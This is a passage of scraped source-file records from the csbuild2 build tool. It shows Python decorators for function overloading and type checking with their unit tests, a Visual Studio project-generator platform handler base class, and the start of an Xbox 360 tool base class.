type, and the element is equal to it, this is\n\t\t\t\t\t\t\t# TOP priority!\n\t\t\t\t\t\t\tif elem == argtype:\n\t\t\t\t\t\t\t\tpriority += 4\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tdisqualified = 
True\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif not disqualified:\n\t\t\t\t\t\t# If we're not disqualified and something else has the same total priority as this, flag it as ambiguous\n\t\t\t\t\t\t# Otherwise put it in the priority map\n\t\t\t\t\t\tif priority in prioritizedFuncs:\n\t\t\t\t\t\t\traise TypeError(\"Call to overloaded function {} is ambiguous: could not determine priority overload based on the provided arguments.\".format(oldFunc.__name__))\n\t\t\t\t\t\tprioritizedFuncs.update({ priority : func })\n\n\t\t\t\t# Now we've built our prioritized function list. If anything's in it at all, pick the one with the highest\n\t\t\t\t# priority and execute. Otherwise, flag a \"no viable overload\"\n\t\t\t\tif prioritizedFuncs:\n\t\t\t\t\torderedFuncs = sorted(prioritizedFuncs.items(), reverse=True)\n\n\t\t\t\t\t# Execute the function and check the return type\n\t\t\t\t\tresult = orderedFuncs[0][1](*args, **kwargs)\n\t\t\t\t\treturntype = argtypes.get('_return', NOT_SET)\n\t\t\t\t\tif returntype != NOT_SET:\n\t\t\t\t\t\tif isinstance(returntype, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\tif not isinstance(result, returntype):\n\t\t\t\t\t\t\t\traise TypeError(\"Function {} returned invalid return type {}; expected {}\".format(oldFunc.__name__, type(result), returntype))\n\t\t\t\t\t\telif result != returntype:\n\t\t\t\t\t\t\traise TypeError(\"Function {} returned invalid return value {}; expected {}\".format(oldFunc.__name__, type(result), returntype))\n\t\t\t\t\treturn result\n\n\t\t\t\traise TypeError(\"No overload of {} found that matches the given arguments: {} {}\".format(oldFunc.__name__, args if args else \"\", kwargs if kwargs else \"\"))\n\n\t\t\t# Back to the outer wrapper now! Everything from here down only happens once per instance of the decorator.\n\t\t\t# Create a persistent overload list as a part of /this/ function\n\t\t\tif not hasattr(Overload, \"funcs\"):\n\t\t\t\tOverload.funcs = {}\n\n\t\t\t# Add this function to the list\n\t\t\tif oldFunc.__name__ in Overload.funcs:\n\t\t\t\tfuncs = Overload.funcs[oldFunc.__name__]\n\t\t\t\tnumArgsTaken = len(oldFunc.__varNames__)\n\t\t\t\tnumDefaults = len(oldFunc.__defaults__) if oldFunc.__defaults__ is not None else 0\n\t\t\t\tnumNonDefaulted = numArgsTaken - numDefaults\n\t\t\t\t# Iterate through the functions to find anything that has the same non-defaulted signature\n\t\t\t\tfor func in funcs:\n\t\t\t\t\tnumOtherArgsTaken = len(func.__varNames__)\n\t\t\t\t\tnumOtherDefaults = len(func.__defaults__) if func.__defaults__ is not None else 0\n\t\t\t\t\tnumOtherNonDefaulted = numOtherArgsTaken - numOtherDefaults\n\t\t\t\t\tif numNonDefaulted != numOtherNonDefaulted: # Different number of non-defaulted arguments, not a dupe\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tdifferentKeywords = False\n\t\t\t\t\tdifferentPositions = False\n\t\t\t\t\tdefaultsProblem = False\n\t\t\t\t\t# Determine if this function has either different keywords or the same keywords in different positions\n\t\t\t\t\tfor i, name in enumerate(func.__varNames__):\n\t\t\t\t\t\tif i >= numNonDefaulted:\n\t\t\t\t\t\t\tdefaultsProblem = True\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\targType = func.__types__.get(name)\n\t\t\t\t\t\totherArgType = oldFunc.__types__.get(name)\n\t\t\t\t\t\tpositionalArgType = oldFunc.__types__.get(oldFunc.__varNames__[i]) if i < numArgsTaken else None\n\n\t\t\t\t\t\tif not isinstance(argType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\targType = None\n\t\t\t\t\t\tif not isinstance(otherArgType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\totherArgType = 
None\n\t\t\t\t\t\tif not isinstance(positionalArgType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\tpositionalArgType = None\n\n\t\t\t\t\t\tif argType is not otherArgType:\n\t\t\t\t\t\t\tdifferentKeywords = True\n\t\t\t\t\t\tif positionalArgType is not argType:\n\t\t\t\t\t\t\tdifferentPositions = True\n\t\t\t\t\t\tif differentKeywords and differentPositions:\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t# If it has the same keywords in the same positions, start checking the types\n\t\t\t\t\tif not differentKeywords or not differentPositions:\n\t\t\t\t\t\tfor i, name in enumerate(oldFunc.__varNames__):\n\t\t\t\t\t\t\tif i >= numNonDefaulted:\n\t\t\t\t\t\t\t\tdefaultsProblem = True\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\targType = func.__types__.get(name)\n\t\t\t\t\t\t\totherArgType = oldFunc.__types__.get(name)\n\t\t\t\t\t\t\tpositionalArgType = oldFunc.__types__.get(oldFunc.__varNames__[i]) if i < numArgsTaken else None\n\n\t\t\t\t\t\t\tif not isinstance(argType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\t\targType = None\n\t\t\t\t\t\t\tif not isinstance(otherArgType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\t\totherArgType = None\n\t\t\t\t\t\t\tif not isinstance(positionalArgType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\t\tpositionalArgType = None\n\n\t\t\t\t\t\t\tif argType is not otherArgType:\n\t\t\t\t\t\t\t\tdifferentKeywords = True\n\t\t\t\t\t\t\tif positionalArgType is not argType:\n\t\t\t\t\t\t\t\tdifferentPositions = True\n\t\t\t\t\t\t\tif differentKeywords and differentPositions:\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tdef _getName(val):\n\t\t\t\t\t\tif hasattr(val, \"__name__\"):\n\t\t\t\t\t\t\treturn val.__name__\n\t\t\t\t\t\treturn str(val)\n\n\t\t\t\t\t# Same positional arguments - error\n\t\t\t\t\tif not differentPositions:\n\t\t\t\t\t\tpositionalKeywordSignature = []\n\t\t\t\t\t\tfor i, name in enumerate(oldFunc.__varNames__):\n\t\t\t\t\t\t\tpositionalKeywordSignature.append({name : _getName(oldFunc.__types__.get(name))})\n\t\t\t\t\t\totherPositionalKeywordSignature = []\n\t\t\t\t\t\tfor i, name in enumerate(func.__varNames__):\n\t\t\t\t\t\t\totherPositionalKeywordSignature.append({name : _getName(func.__types__.get(name))})\n\t\t\t\t\t\tif defaultsProblem:\n\t\t\t\t\t\t\traise TypeError(\n\t\t\t\t\t\t\t\t\"Two or more overloads of {} share the same deduced positional signature except for defaulted parameters: \"\n\t\t\t\t\t\t\t\t\"{} and {}, with defaults starting at position {}: {} and {}\".format(\n\t\t\t\t\t\t\t\t\toldFunc.__name__,\n\t\t\t\t\t\t\t\t\tpositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\totherPositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\tnumNonDefaulted+1,\n\t\t\t\t\t\t\t\t\toldFunc.__defaults__,func.__defaults__\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\traise TypeError(\n\t\t\t\t\t\t\t\t\"Two or more overloads of {} share the same deduced positional signature: {} and {}\".format(\n\t\t\t\t\t\t\t\t\toldFunc.__name__,\n\t\t\t\t\t\t\t\t\tpositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\totherPositionalKeywordSignature\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t)\n\n\t\t\t\t\t# Same keyword arguments - error\n\t\t\t\t\tif not differentKeywords:\n\t\t\t\t\t\tpositionalKeywordSignature = []\n\t\t\t\t\t\tfor i, name in enumerate(oldFunc.__varNames__):\n\t\t\t\t\t\t\tpositionalKeywordSignature.append({name : _getName(oldFunc.__types__.get(name))})\n\t\t\t\t\t\totherPositionalKeywordSignature = []\n\t\t\t\t\t\tfor i, name in enumerate(func.__varNames__):\n\t\t\t\t\t\t\totherPositionalKeywordSignature.append({name : _getName(func.__types__.get(name))})\n\t\t\t\t\t\tif 
defaultsProblem:\n\t\t\t\t\t\t\traise TypeError(\n\t\t\t\t\t\t\t\t\"Two or more overloads of {} share the same deduced keyword signature except for defaulted parameters: \"\n\t\t\t\t\t\t\t\t\"{} and {}, with defaults starting at position {}: {} and {}\".format(\n\t\t\t\t\t\t\t\t\toldFunc.__name__,\n\t\t\t\t\t\t\t\t\tpositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\totherPositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\tnumNonDefaulted+1,\n\t\t\t\t\t\t\t\t\toldFunc.__defaults__,\n\t\t\t\t\t\t\t\t\tfunc.__defaults__\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\traise TypeError(\n\t\t\t\t\t\t\t\"Two or more overloads of {} share the same deduced keyword signature: {} and {}\".format(\n\t\t\t\t\t\t\t\toldFunc.__name__,\n\t\t\t\t\t\t\t\tpositionalKeywordSignature,\n\t\t\t\t\t\t\t\totherPositionalKeywordSignature\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t)\n\t\t\t\tfuncs.append(oldFunc)\n\t\t\telse:\n\t\t\t\tOverload.funcs[oldFunc.__name__] = [oldFunc]\n\t\t\treturn _wrap\n\t\treturn _wrapOuter\n\n\ndef MetaClass(meta):\n\t\"\"\"\n\tDecorator to enable metaclasses in a way that's compliant with both python 2 and python 3\n\t(and arguably nicer and more readable than both)\n\n\t:param meta: Class to decorate\n\t:type meta: any\n\t:return: The class with metaclass added to it\n\t:rtype: type\n\t\"\"\"\n\tdef _wrap(cls):\n\t\treturn meta(cls.__name__, cls.__bases__, dict(cls.__dict__))\n\treturn _wrap\n\n### UNIT TESTS ###\n\nclass TestTypeCheck(testcase.TestCase):\n\t\"\"\"Test for the TypeChecked decorator\"\"\"\n\n\tdef setUp(self):\n\t\tOverload.funcs = {}\n\n\t# pylint: disable=unused-argument,unused-variable,no-self-use,invalid-name\n\tdef testSimpleTypeCheck(self):\n\t\t\"\"\"Simple test that type checks work for built-in types\"\"\"\n\t\t@TypeChecked(var1=int, var2=StrType)\n\t\tdef _simpleCheck(var1, var2):\n\t\t\tpass\n\n\t\tself.assertRaises(TypeError, _simpleCheck, \"1\", 2)\n\t\tself.assertRaises(TypeError, _simpleCheck, 1, 2)\n\t\tself.assertRaises(TypeError, _simpleCheck, \"1\", \"2\")\n\t\t_simpleCheck(1, \"2\")\n\n\tdef testComplexTypeCheck(self):\n\t\t\"\"\"Test that type checks work when the type specified is a tuple or abstract base class\"\"\"\n\t\timport numbers\n\t\t@TypeChecked(var1=(int, StrType), var2=numbers.Number)\n\t\tdef _tupleABCCheck(var1, var2):\n\t\t\tpass\n\n\t\t_tupleABCCheck(1, 2)\n\t\t_tupleABCCheck(\"1\", 2)\n\t\t_tupleABCCheck(1, 2.0)\n\t\t_tupleABCCheck(\"1\", 2.0)\n\n\tdef testParamNone(self):\n\t\t\"\"\"Test that the value None passed as a type raises an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@TypeChecked(var1=None)\n\t\t\tdef _noneCheck(var1):\n\t\t\t\tpass\n\n\tdef testParamInt(self):\n\t\t\"\"\"Test that a non-type value other than None raises an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@TypeChecked(var1=1)\n\t\t\tdef _noneCheck(var1):\n\t\t\t\tpass\n\n\tdef testOldAndNewClasses(self):\n\t\t\"\"\"Test that both old-style and new-style classes are accepted and work properly\"\"\"\n\t\tclass _oldClass: # pylint: disable=bad-option-value,old-style-class,no-init\n\t\t\tpass\n\n\t\tclass _newClass(object):\n\t\t\tpass\n\n\t\t@TypeChecked(var1=_oldClass, var2=_newClass)\n\t\tdef _classCheck(var1, var2):\n\t\t\tpass\n\n\t\t_classCheck(_oldClass(), _newClass())\n\t\tself.assertRaises(TypeError, _classCheck, _oldClass(), _oldClass())\n\t\tself.assertRaises(TypeError, _classCheck, _newClass(), _oldClass())\n\t\tself.assertRaises(TypeError, _classCheck, _newClass(), _newClass())\n\n\tdef testInvalidVar(self):\n\t\t\"\"\"Test that a 
variable name specified that doesn't exist raises an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@TypeChecked(var1=int)\n\t\t\tdef _invalidVar(var2):\n\t\t\t\tpass\n\n\nclass TestOverload(testcase.TestCase):\n\t\"\"\"Test for the Overload decorator\"\"\"\n\n\t# pylint: disable=unused-argument,unused-variable,no-self-use,invalid-name,function-redefined\n\tdef testSimpleOverloads(self):\n\t\t\"\"\"Test that overloads work in the general case and non-matching argument sets throw exceptions\"\"\"\n\n\t\tclass _sharedLocals(object):\n\t\t\tintstr = False\n\t\t\tstrint = False\n\n\t\t@Overload(arg1=int, arg2=StrType)\n\t\tdef _simpleOverload(arg1, arg2):\n\t\t\t_sharedLocals.intstr = True\n\n\t\t@Overload(arg1=StrType, arg2=int)\n\t\tdef _simpleOverload(arg1, arg2):\n\t\t\t_sharedLocals.strint = True\n\n\t\t_simpleOverload(1, \"2\")\n\t\tself.assertTrue(_sharedLocals.intstr)\n\t\tself.assertFalse(_sharedLocals.strint)\n\t\t_sharedLocals.intstr = False\n\n\t\t_simpleOverload(\"1\", 2)\n\t\tself.assertTrue(_sharedLocals.strint)\n\t\tself.assertFalse(_sharedLocals.intstr)\n\n\t\twith self.assertRaises(TypeError):\n\t\t\t_simpleOverload(\"1\", \"2\")\n\n\t\twith self.assertRaises(TypeError):\n\t\t\t_simpleOverload(1, 2)\n\n\tdef testValueOverloads(self):\n\t\t\"\"\"Test that an overload on a value works and has higher priority than an overload on a type\"\"\"\n\n\t\tclass _sharedLocals(object):\n\t\t\tzero = False\n\t\t\tone = False\n\n\t\t@Overload(arg1=0)\n\t\tdef _simpleOverload(arg1):\n\t\t\t_sharedLocals.zero = True\n\n\t\t@Overload(arg1=int)\n\t\tdef _simpleOverload(arg1):\n\t\t\t_sharedLocals.one = True\n\n\t\t_simpleOverload(1)\n\t\tself.assertTrue(_sharedLocals.one)\n\t\tself.assertFalse(_sharedLocals.zero)\n\t\t_sharedLocals.one = False\n\n\t\t_simpleOverload(0)\n\t\tself.assertTrue(_sharedLocals.zero)\n\t\tself.assertFalse(_sharedLocals.one)\n\n\tdef testInvalidVar(self):\n\t\t\"\"\"Test that a variable name specified that doesn't exist raises an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@Overload(var1=int)\n\t\t\tdef _invalidVar(var2):\n\t\t\t\tpass\n\n\tdef testDoubleOverload(self):\n\t\t\"\"\"Test that creating an overload with a signature that's already been made throws an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@Overload(var1=int)\n\t\t\tdef _doubleOverload(var1):\n\t\t\t\tpass\n\t\t\t@Overload(var1=int)\n\t\t\tdef _doubleOverload(var1):\n\t\t\t\tpass\n" }, { "alpha_fraction": 0.7636623978614807, "alphanum_fraction": 0.7640438675880432, "avg_line_length": 33.04220962524414, "blob_id": "1d9b2bbbd85d38c3efb98db67a9ae94a48046ee5", "content_id": "9acd48059968a614a1528192982d75b866073d51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10485, "license_type": "no_license", "max_line_length": 144, "num_lines": 308, "path": "/csbuild/tools/project_generators/visual_studio/platform_handlers/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2018 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: platform_handlers\n\t:synopsis: Built-in platform handlers for the Visual Studio project generator.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport abc\n\nfrom csbuild._utils.decorators import MetaClass\n\nfrom xml.etree import ElementTree as ET\n\ndef _ignore(_):\n\tpass\n\nclass VsInstallInfo(object):\n\t\"\"\"\n\tVisual Studio version data helper class.\n\n\t:ivar friendlyName: Friendly version name for logging.\n\t:type friendlyName: str\n\n\t:ivar fileVersion: File format version (e.g., \"Microsoft Visual Studio Solution File, Format Version XX.XX\" where \"XX.XX\" is the member value).\n\t:type fileVersion: str\n\n\t:ivar versionId: Version of Visual Studio the solution belongs to (e.g., \"# Visual Studio XX\" where \"XX\" is the member value).\n\t:type versionId: str\n\n\t:ivar toolsetVersion: Platform toolset version for the Visual Studio version.\n\t:type toolsetVersion: str\n\t\"\"\"\n\tdef __init__(self, friendlyName, fileVersion, versionId, toolsetVersion):\n\t\tself.friendlyName = friendlyName\n\t\tself.fileVersion = fileVersion\n\t\tself.versionId = versionId\n\t\tself.toolsetVersion = toolsetVersion\n\n\n@MetaClass(abc.ABCMeta)\nclass VsBasePlatformHandler(object):\n\t\"\"\"\n\tVisual Studio platform handler base class.\n\n\t:ivar buildSpec: Internal build specification being written.\n\t:type buildSpec: tuple[str, str, str]\n\n\t:ivar vsInstallInfo: Information relating to the selected version of Visual Studio.\n\t:type vsInstallInfo: csbuild.tools.project_generators.visual_studio.platform_handlers.VsInstallInfo\n\t\"\"\"\n\tdef __init__(self, buildSpec, vsInstallInfo):\n\t\tself.buildSpec = buildSpec\n\t\tself.vsInstallInfo = vsInstallInfo\n\n\t\tself._addXmlNode = ET.SubElement\n\n\t@staticmethod\n\tdef GetVisualStudioPlatformName(): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tGet the name that is recognizable by Visual Studio for the current platform.\n\n\t\t:return: Visual Studio platform name.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tpass\n\n\t@staticmethod\n\tdef GetOutputExtensionIfDebuggable(projectOutputType): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tGet the file extension of the input project output type for the current platform.\n\t\tOnly applies to debuggable projects. 
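(For example, a Windows desktop handler would typically map an executable output type to \".exe\".) 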
Any other project types should return `None`.\n\n\t\t:param projectOutputType: Final output type of a project.\n\t\t:type projectOutputType: any\n\n\t\t:return: Application extension.\n\t\t:rtype: str or None\n\t\t\"\"\"\n\t\t_ignore(projectOutputType)\n\t\treturn None\n\n\t@staticmethod\n\tdef GetIntellisenseIncludeSearchPaths(project, buildSpec):\n\t\t\"\"\"\n\t\tGet a list of any platform-specific include search paths needed by intellisense.\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:return: List of include search paths.\n\t\t:rtype: list[str]\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\t\treturn []\n\n\t@staticmethod\n\tdef GetIntellisensePreprocessorDefinitions(project, buildSpec):\n\t\t\"\"\"\n\t\tGet a list of any platform-specific preprocessor definitions needed by intellisense.\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:return: List of preprocessor definitions.\n\t\t:rtype: list[str]\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\t\treturn []\n\n\t@staticmethod\n\tdef GetIntellisenseAdditionalOptions(project, buildSpec): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tGet any additional NMake options to configure intellisense.\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:return: Additional NMake options.\n\t\t:rtype: str or None\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\t\treturn \"\"\n\n\tdef WriteGlobalHeader(self, parentXmlNode, project):\n\t\t\"\"\"\n\t\tWrite any top-level information about this platform at the start of the project file.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteGlobalFooter(self, parentXmlNode, project):\n\t\t\"\"\"\n\t\tWrite any final data nodes needed by the project.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteGlobalImportTargets(self, parentXmlNode, project):\n\t\t\"\"\"\n\t\tWrite global import target needed for the project.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteProjectConfiguration(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the project configuration nodes for this platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: 
xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tprojectConfigXmlNode = self._addXmlNode(parentXmlNode, \"ProjectConfiguration\")\n\t\tprojectConfigXmlNode.set(\"Include\", vsBuildTarget)\n\n\t\tconfigXmlNode = self._addXmlNode(projectConfigXmlNode, \"Configuration\")\n\t\tconfigXmlNode.text = vsConfig\n\n\t\tplatformXmlNode = self._addXmlNode(projectConfigXmlNode, \"Platform\")\n\t\tplatformXmlNode.text = vsPlatformName\n\n\tdef WriteConfigPropertyGroup(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the property group nodes for the project's configuration and platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteImportProperties(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite any special import properties for this platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\timportGroupXmlNode = self._addXmlNode(parentXmlNode, \"ImportGroup\")\n\t\timportGroupXmlNode.set(\"Label\", \"PropertySheets\")\n\t\timportGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\timportXmlNode = self._addXmlNode(importGroupXmlNode, \"Import\")\n\t\timportXmlNode.set(\"Label\", \"LocalAppDataPlatform\")\n\t\timportXmlNode.set(\"Project\", r\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\")\n\t\timportXmlNode.set(\"Condition\", r\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\")\n\n\tdef WriteUserDebugPropertyGroup(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the property group nodes specifying the user debug settings.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param 
vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteExtraPropertyGroupBuildNodes(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite extra property group nodes related to platform build properties.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tpass\n" }, { "alpha_fraction": 0.6101759076118469, "alphanum_fraction": 0.6265075206756592, "avg_line_length": 33.60869598388672, "blob_id": "da715e5ced1a34dabdf1208c30e6fdc144b41f8e", "content_id": "a3665f63a9b6678bb4f4bfe7eb227fdefeecfc15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7960, "license_type": "no_license", "max_line_length": 117, "num_lines": 230, "path": "/csbuild/tools/common/xbox_360_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: xbox_360_tool_base\n\t:synopsis: Base tools for the Xbox 360 tool implementations.\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom abc import ABCMeta\n\nfrom csbuild import commands, log\n\nfrom .tool_traits import HasOptimizationLevel\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\n\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\n\n@MetaClass(ABCMeta)\nclass Xbox360BaseTool(Tool):\n\t\"\"\"\n\tParent class for all Xbox 360 tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._xbox360SdkPath = projectSettings.get(\"xbox360SdkPath\", None)\n\n\t\tself._xbox360BinPath = None # type: str or None\n\t\tself._xbox360LibPath = None # type: str or None\n\t\tself._xbox360IncludePath = None # type: str or None\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetXbox360SdkPath(path):\n\t\t\"\"\"\n\t\tSet the path to the Xbox 360 SDK.\n\n\t\t:param path: Path to the Xbox 360 SDK.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"xbox360SdkPath\", os.path.abspath(path) if path else None)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base 